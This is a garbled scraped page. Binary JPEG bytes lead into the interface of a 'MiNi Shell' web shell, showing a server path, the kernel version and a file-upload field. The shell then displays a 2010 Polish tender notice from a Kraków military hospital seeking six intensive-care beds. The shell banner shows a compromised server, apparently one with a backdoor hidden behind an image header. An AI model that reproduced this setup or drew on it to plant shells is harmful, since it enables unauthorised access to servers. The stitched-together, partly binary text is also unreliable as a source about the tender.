JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20101123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20101123/379534-N-2010.html

<p class="kh_header"><b>Kraków: DOSTAWA ŁÓŻEK INTENSYWNEJ TERAPII</b><br>
<b>Numer ogłoszenia: 379534 - 2010; data zamieszczenia: 23.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 5 Wojskowy Szpital Kliniczny z Polikliniką Samodzielny Publiczny ZOZ , ul. Wrocławska 1-3, 30-901 Kraków, woj. małopolskie, tel. 012 6308057, 6308059, faks 012 6308059.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.5wszk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ŁÓŻEK INTENSYWNEJ TERAPII.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA 
Przedmiotem zamówienia jest dostawa fabrycznie nowych łóżek intensywnej terapii- 6 szt , montaż, instalacja, uruchomienie (rozruch) i przeszkolenie personelu Zamawiającego w zakresie jego obsługi i eksploatacji.
Kod CPV -33192120-9 
Łóżka szpitalne
Producent :
Typ urządzenia :
Kraj pochodzenia :
Rok produkcji : 2010

I.	OPIS PRZEDMIOTU ZAMÓWIENIA - ZESTAWIENIE PARAMETRÓW TECHNICZNYCH

L.P.	FUNKCJA-PARAMETR	WARUNEK GRANICZNY	

J.M.	
PARAMETRY 
OFEROWANE
1.	Łóżko intensywnej terapii	TAK	5 szt.	
1.1	Zasilanie 230 V, 50 Hz z wbudowanym akumulatorem do zasilania podczas transportu ze wskaźnikiem stanu naładowania oraz wskaźnikiem żywotności akumulatora - konieczności wymiany w przeciągu najbliższych 2 miesięcy	Tak		
1.2	Długość zewnętrzna łóżka -  2160mm (+-50mm) z możliwością przedłużania leża dla pacjentów wysokiego wzrostu	Tak, podać		
1.3	Szerokość zewnętrzna łóżka 940mm (+-50mm) wraz z barierkami umożliwiająca przejazd przez wąskie otwory drzwiowe na oddziale szpitala	Tak ,podać		
1.4	Leże łóżka  4 - sekcyjne oparte na nowoczesnej konstrukcji opartej na dwóch kolumnach cylindrycznych gwarantującej łatwą dezynfekcję i walkę z infekcjami . 
Nie dopuszcza się rozwiązań konstrukcyjnych opartych na pentagramie, mechanizmach korbowych czy też kolumnach niecylindrycznych niezabezpieczonych przed wnikaniem zanieczyszczeń - posiadających wiele trudnodostępnych miejsc - utrudniających lub tez uniemożliwiających skuteczną dezynfekcje-czyszczenie łóżka- i zwiększających ryzyko powstawania infekcji.	Tak		
1.5	Szczyty łóżka wyjmowane od strony nóg i głowy	Tak		
1.6	Sterowanie elektryczne przy pomocy :
-	Pilota przewodowego dla pacjenta
-	Panelu sterowniczego dla personelu montowanego na szczycie od strony nóg lub chowanego pod leże od strony nóg	Tak		
1.7	Regulacja elektryczna wysokości leża (bez materaca), w zakresie 340 mm do 760 mm (+- 50 mm) gwarantująca bezpieczne opuszczanie łóżka i zapobiegająca zeskakiwaniu z łóżka,nie dotykaniu pełnymi stopami podłogi podczas opuszczania łóżka/. Nie dopuszcza się rozwiązań o wysokości minimalnej wyższej narażającej pacjenta na ryzyko upadków	Tak, podać		
1.8	Regulacja elektryczna części plecowej w zakresie  75 +- 5	Tak, podać		
1.9	Regulacja elektryczna części nożnej w zakresie 45 +- 5	Tak, podać		
1.10	Regulacja elektryczna funkcji autokontur uzyskiwana jednym przyciskiem, sterowanie przy pomocy pilota i panelu sterowniczego montowanym na szczycie łóżka od strony nóg	Tak		
1.11	Funkcja autoregresji o parametrach niwelujących ryzyko powstawania odleżyn 	Tak		
1.12	Regulacja elektryczna pozycji Trendelenburga 20 +- 4 - sterowanie z panelu sterowniczego montowanym na szczycie łóżka od strony nóg	Tak, podać		
1.13	Regulacja elektryczna pozycji anty-Trendelenburga  20+- 4 - sterowanie z panelu sterowniczego montowanym na szczycie łóżka od strony nóg	Tak, podać		
1.14	Regulacja elektryczna do pozycji krzesła kardiologicznego - sterowanie przy pomocy jednego oznaczonego odpowiednim piktogramem przycisku na montowanym na szczycie łóżka od strony nóg	Tak		
1.15	Elektryczna funkcja CPR z każdej pozycji do reanimacji - sterowanie przy pomocy jednego przycisku oznaczonego odpowiednim piktogramem na panelu sterowniczym montowanym na szczycie łóżka od strony nóg	Tak		
1.16	Wyłączniki-blokady (przy pomocy piktogramów) funkcji elektrycznych (na panelu sterowniczym) dla poszczególnych regulacji:
- regulacji wysokości
- regulacji części plecowej 
- regulacji części nożnej 
- regulacji pozycji Trendelenburga i anty-
 Trendelenburga 	Tak		
1.17	Zabezpieczenie przed nieświadomym uruchomieniem funkcji poprzez konieczność wciśnięcia przyciska uruchamiającego dostępność funkcji  . Dostępność funkcji dostępne w sterowaniu: na pilocie i panelu sterowniczym	Tak		
1.18	Odłączenie wszelkich regulacji z pilota lub panelu po max 180 sekundach nieużywania regulacji (konieczność świadomego ponownego uruchomienia regulacji)	Tak		
1.19	Przycisk bezpieczeństwa (oznaczony charakterystycznie: STOP lub tez o innym oznaczeniu) natychmiastowe odłączenie wszystkich funkcji elektrycznych w przypadku wystąpienia zagrożenia dla pacjenta lub personelu również odcinający funkcje w przypadku braku podłączenia do sieci - pracy na akumulatorze. System odłączający wszystkie sterowania: panel, i pilot. System uniemożliwiający jakąkolwiek regulację nie tylko jako blokadę poszczególnych segmentów ale również deaktywujący przyciski z pozycjami programowalnymi. Przycisk bezpieczeństwa umieszczony na panelu sterowniczym.	Tak		
1.20	Elektryczna i mechaniczna funkcja CPR	Tak		
1.21	Koła z systemem sterowania jazdy na wprost i boki z centralnym systemem hamulcowym. 	Tak		
1.22	Pojedyncze koła jezdne o średnicy 150mm gwarantujące doskonałą mobilność łóżka	Tak		
1.23	Bezpieczne obciążenie robocze na poziomie minimum 230kg. Pozwalające na wszystkie możliwe regulacje przy tym obciążeniu bez narażenia bezpieczeństwa pacjenta i powstanie incydentu medycznego	Tak, podać		
1.24	4 kółka odbojowe chroniące przed uszkodzeniami	Tak		
1.25	Wyposażenie:
-	Barierki boczne jednoczęściowe składane wzdłuż ramy leża, nie poszerzające gabarytów łóżka.
-	materac z pianki poliuretanowej  z pokryciem odpinanym na zamek błyskawiczny, nie przepuszczającym płynów infuzyjnych a przepuszczającym powietrze
-	uchwyt na worki do moczu po każdej stronie łóżka 
-	półka na pościel
-	materac przeciwodleżynowy z pompą	Tak ,podać		
2.	Łóżko intensywnej terapii z przechyłem bocznym	Tak	1 szt.	
2.1	Zasilanie 230 V, 50 Hz z wbudowanym akumulatorem do zasilania podczas transportu ze wskaźnikiem stanu naładowania oraz wskaźnikiem żywotności akumulatora - konieczności wymiany w przeciągu najbliższych 2 miesięcy	Tak		
2.2	Długość zewnętrzna 2200mm (+-50mm) z możliwością przedłużania 	Tak, podać		
2.3	Szerokość zewnętrzna łóżka - 980 mm (+-50mm)	Tak podać		
2.4	Leże łóżka  4 - sekcyjne oparte na nowoczesnej konstrukcji opartej na trzech kolumnach cylindrycznych gwarantującej łatwą dezynfekcję i walkę z infekcjami . 
Nie dopuszcza się rozwiązań konstrukcyjnych opartych na pentagramie, mechanizmach korbowych czy też kolumnach niecylindrycznych niezabezpieczonych przed wnikaniem zanieczyszczeń - posiadających wiele trudnodostępnych miejsc - utrudniających lub tez uniemożliwiających skuteczną dezynfekcje-czyszczenie łóżka- i zwiększających ryzyko powstawania infekcji.	Tak		
2.5	Szczyty tworzywowe wyjmowane od strony nóg i głowy	Tak		
2.6	Sterowanie elektryczne przy pomocy :
-	Pilota przewodowego dla pacjenta
-	panelu sterowniczego montowanego na szczycie od strony nóg z możliwością swobodnego wyjmowania i umieszczania na szczycie czy też półce na pościel
-	paneli nożnych do sterowania przechyłami bocznymi z obu stron łóżka	Tak		
2.7	Regulacja elektryczna wysokości leża, w zakresie 380 mm do 750 mm (+- 50 mm) gwarantująca bezpieczne opuszczanie łóżka i zapobiegająca zeskakiwaniu z łóżka nie dotykaniu pełnymi stopami podłogi podczas opuszczania łóżka. Nie dopuszcza się rozwiązań o wysokości minimalnej wyższej narażającej pacjenta na ryzyko upadków 	Tak, podać		
2.8	Regulacja elektryczna części plecowej w zakresie  75 +- 5	Tak, podać		
2.9	Regulacja elektryczna części nożnej w zakresie 45 +- 5	Tak, podać		
2.10	Regulacja elektryczna funkcji autokontur , sterowana przy pomocy pilota  i panelu sterowniczego montowanego na szczycie łóżka od strony nóg	Tak		
2.11	Funkcja autoregresji o parametrach niwelujących ryzyko powstawania odleżyn	Tak		
2.12	Regulacja elektryczna pozycji Trendelenburga 20+- 4 - sterowanie z panelu sterowniczego montowanego na szczycie łóżka od strony nóg	Tak, podać		
2.13	Regulacja elektryczna pozycji anty-Trendelenburga  20 (+- 4)   - sterowanie z panelu sterowniczego montowanego na szczycie łóżka od strony nóg. 	Tak, podać		
2.14	Regulacja elektryczna przechyłów bocznych z panelu sterowniczego oraz przycisków nożnych po obu stronach łóżka jako podstawowy wymóg bezpieczeństwa przy wykonywaniu procedur przy jednoczesnym asekurowaniu przechyłu pacjenta oraz pozwalająca na wykonywanie procedury przez jedną osobę bez konieczności wzywania osoby pomagającej	Tak		
2.15	Pełna regulacja przechyłów bocznych w najniższym położeniu leża w celu ułatwienia opuszczania łóżka przez pacjenta min. 15Tak		
2.16	Przyciski sterowania nożnego zabezpieczone przyciskiem świadomego uruchomienia regulacji (konieczność poprzedzenia procedury przechyłów naciśnięciem przycisku odblokowującego) . Nie dopuszcza się rozwiązań narażających na nieświadomą regulację i zmniejszającą bezpieczeństwo pacjenta	Tak
		
2.17	Regulacja elektryczna do pozycji krzesła kardiologicznego - sterowanie przy pomocy jednego oznaczonego odpowiednim piktogramem przycisku na panelu sterowniczym montowanym na szczycie łóżka od strony nóg	Tak		
2.18	Regulacja elektryczna funkcja CPR z co najmniej podwójną prędkością w stosunku do innych regulacji pozycji ratującej życie - do reanimacji - sterowana przy pomocy jednego przycisku oznaczonego odpowiednim piktogramem na panelu sterowniczym montowanym na szczycie łóżka od strony nóg	Tak		
2.19	Regulacja elektryczna, natychmiastowa pozycja antyszokowa (pozycja ratującej życie) z co najmniej podwójną prędkością w stosunku do innych regulacji- sterowania przy pomocy jednego przycisku oznaczonego odpowiednim piktogramem na panelu sterowniczym montowanym na szczycie łóżka od strony nóg	Tak		
2.20	Regulacja elektryczna, natychmiastowa pozycja egzaminacyjna - sterowana przy pomocy przycisków nożnych i dodatkowo jednego przycisku oznaczonego odpowiednim piktogramem na panelu sterowniczym montowanym na szczycie łóżka od strony nóg	Tak		
2.21	Wyłączniki blokady funkcji elektrycznych (na panelu sterowniczym) dla poszczególnych regulacji:
- regulacji wysokości
- regulacji części plecowej 
- regulacji części nożnej 
- regulacji pozycji Trendelenburga i anty-
 Trendelenburga 
- regulacji przechyłów bocznych
- sterowań nożnych	Tak		
2.22	Zabezpieczenie przed nieświadomym uruchomieniem funkcji poprzez konieczność wciśnięcia przyciska uruchamiającego dostępność funkcji . Przycisk świadomego uruchomienia systemu elektrycznego łóżka znajdujący się w każdym możliwym sterowaniu: panelu oraz sterowaniu nożnym dla personelu, pilocie dla pacjenta 	Tak		
2.23	Odłączenie wszelkich regulacji z pilota , sterowań nożnych i panelu po max 180 sekundach nieużywania regulacji chroniącej pacjenta przed nagłymi niepożądanymi regulacjami (konieczność świadomego ponownego uruchomienia regulacji)	Tak		
2.24	Przycisk bezpieczeństwa (oznaczony charakterystycznie: STOP lub tez o innym oznaczeniu) natychmiastowe odłączenie wszystkich funkcji elektrycznych w przypadku wystąpienia zagrożenia dla pacjenta lub personelu również odcinający funkcje w przypadku braku podłączenia do sieci - pracy na akumulatorze. System odłączający wszystkie sterowania: panel, pilot i sterowania nożne. System uniemożliwiający jakąkolwiek regulację nie tylko jako blokadę poszczególnych segmentów ale również deaktywujący przyciski z pozycjami programowalnymi.	Tak		
2.25	Elektryczna i mechaniczna funkcja CPR	Tak		
2.26	Wskaźniki kątowe leża i segmentu pleców oraz najniższej pozycji leża	Tak		
2.27	Koła jezdne z systemem sterowania jazdy na wprost i boki z centralnym systemem hamulcowym	Tak		
2.28	Koła o średnicy 150mm gwarantujące doskonałą mobilność łóżka wyposażone w inteligentny system blokowania podstawy czyli automatyczne samoczynne blokowanie się wszystkich kół po max 180 sekundach nieużywania łóżka 	Tak		
2.29	Bezpieczne obciążenie robocze na poziomie minimum 180 kg. Pozwalające na wszystkie możliwe regulacje przy tym obciążeniu bez narażenia bezpieczeństwa pacjenta i powstanie incydentu medycznego	Tak		
2.30	4 kółka odbojowe chroniące przed uszkodzeniami	Tak		
2.31	Wyposażenie:
-	Barierki boczne jednoczęściowe składane wzdłuż ramy leża optymalne do korzystania z funkcji przechyłów bocznych, nie poszerzające gabarytów łóżka.
-	materac z pianki poliuretanowej  z pokryciem odpinanym na zamek błyskawiczny, nie przepuszczającym płynów infuzyjnych a przepuszczającym powietrze
-	uchwyt na worki do moczu po każdej stronie łóżka
-	półka na pościel
-	materac przeciwodleżynowy z pompą	Tak 		
3.	Inne	TAK		
3.1	Oświadczenie,  potwierdzające dopuszczenie do używania na terenie RP (atesty, certyfikaty) zgodnie z Ustawą o Wyrobach Medycznych	TAK		
3.2	Dołączyć folder wraz z opisem	TAK		
3.3	Instrukcja obsługi i opis techniczny  w języku polskim  przy dostawie	TAK		








               II.   OPIS PRZEDMIOTU ZAMÓWIENIA -ZESTAWIENIE WARUNKÓW GRANICZNYCH GWARANCJI 
L.p.	
PARAMETR	WARUNEK GRANICZNY	WARUNEK OFEROWANY
A.	OKRES GWARANCJI		
1.		Okres pełnej bezpłatnej gwarancji  [miesiące]	min. 24 miesiące	PODAĆ  ILE
2.		Czas reakcji na zgłoszoną awarię [godz.]	max. 48 godzin	PODAĆ  ILE
3.		Każda naprawa gwarancyjna powoduje przedłużenie okresu gwarancji o czas naprawy 	TAK	
4.		Liczba bezpłatnych przeglądów w czasie gwarancji 	co 12 miesięcy	PODAĆ  ILE
5.		Na czas naprawy wykonawca dostarczy w ciągu max. 72 godzin urządzenie zastępcze	TAK	
6.		Koszt transportu uszkodzonego elementu urządzenia lub urządzenia podlegającego naprawie lub wymianie do i z punktu serwisowego pokrywa Wykonawca	TAK	
	
B.	SERWIS POGWARANCYJNY	
1.		Okres zagwarantowania dostępności części zamiennych oraz materiałów zużywalnych od daty podpisania protokołu odbioru technicznego [w latach ].	min. 10 lat	PODAĆ  ILE
2.		Okres gwarancji dla nowo zainstalowanych elementów po naprawie	min.6 miesięcy	PODAĆ  ILE
3.		Inne		PODAĆ  JEŚLI  WYSTĘPUJĄ
C.	SZKOLENIA	
1.		Personel medyczny  potwierdzone certyfikatem	TAK	
2.		Personel techniczny w zakresie napraw i przeglądów serwisowych  potwierdzone certyfikatem	TAK	
3.		Inne 		PODAĆ  JEŚLI  WYSTĘPUJĄ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.19.21.20-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o posiadaniu  uprawnienia do wykonania zamówienia;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o posiadaniu wiedzy i doświadczenia niezbędnego  do wykonania zamówienia;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o dysponowaniu potencjałem technicznym do wykonania  zamówienia;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o dysponowaniu  osobami zdolnymi do wykonania  zamówienia;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o znajdowaniu się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>. Wypełniony FORMULARZ OFERTOWY - według ZAŁĄCZNIKA NR 2 do SIWZ.
2. Wypełniony we wskazanych miejscach - FORMULARZ CENOWY - OPIS PRZEDMIOTU ZAMÓWIENIA - według ZAŁĄCZNIKA NR 1 do SIWZ.
3. Pełnomocnictwo umocowujące przynajmniej w zakresie podpisania oferty w postępowaniu 
o udzielenie zamówienia publicznego, dołączone do oferty, o ile nie wynika z innych dokumentów, załączonych przez Wykonawcę. 
4. Aktualny odpis z właściwego rejestru w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

  5.		Oświadczenie Wykonawcy w trybie art. 44 ustawy, dotyczące spełnienia warunków udziału 
 w postępowaniu, zgodnie z art. 22 ustawy oraz dotyczące braku podstaw do wykluczenia w oparciu o art.    24 ustawy, ściśle według formularza stanowiącego ZAŁĄCZNIK NR 3 do SIWZ.
6. Oświadczenie potwierdzające, iż zaoferowany przedmiot zamówienia, zawarty 
w  FORMULARZU CENOWYM - OPISIE PRZEDMIOTU ZAMÓWIENIA, stanowiący ofertę, dla tych pozycji, które tego wymagają spełnia wymagania przewidziane w ustawie 
z 20  kwietnia 2004 roku  - o wyrobach medycznych (Dz. U. nr 93, poz. 896, z późn. zm.), a także w ustawie z  06 września 2001 roku - Przepisy wprowadzające ustawę - Prawo farmaceutyczne, ustawę  o wyrobach medycznych oraz ustawę o Urzędzie Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych (Dz. U. nr 126, poz. 882, z późn. zm.) oraz ustawie z 20 kwietnia 2004 roku - o zmianie ustawy - Prawo farmaceutyczne, ustawy o zawodzie lekarza oraz ustawy - Przepisy wprowadzające ustawę - Prawo farmaceutyczne, ustawę o wyrobach medycznych oraz ustawę o Urzędzie Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych (Dz. U. nr 92, poz. 1382, z późn. zm.) a także 
w obowiązujących przepisach Unii Europejskiej, ściśle według ZAŁĄCZNIKA NR 5 do SIWZ.
7.	Folder z opisem przedmiotu zamówienia 
8.  Oświadczenie, że zaoferowany sprzęt  jest fabrycznie nowy (rok produkcji 2010 rok), kompletny i gotowy do funkcjonowania bez żadnych dodatkowych zakupów i inwestycji, gwarantuje bezpieczeństwo pacjentów oraz personelu medycznego, a także zapewnia wymagany poziom świadczonych usług medycznych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Kupujący przewiduje możliwość zmiany umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Sprzedający, jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Kupującego, a także dotyczą: 
-	zmiany świadczenia Sprzedającego na świadczenie lepszej jakości przy zachowaniu tożsamości towaru,
-	wydłużenia terminu wykonania umowy z powodu okoliczności niezależnych od Sprzedającego,
-	zmiany danych Sprzedającego ( np. zmiana siedziby, adresu, nazwy),
-	działania siły wyższej lub wystąpienia stanu wyższej konieczności
-	wystąpienia warunków atmosferycznych całkowicie uniemożliwiających wykonanie przedmiotu zamówienia  w wyznaczonych terminach
-	zmian organizacyjnych Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe
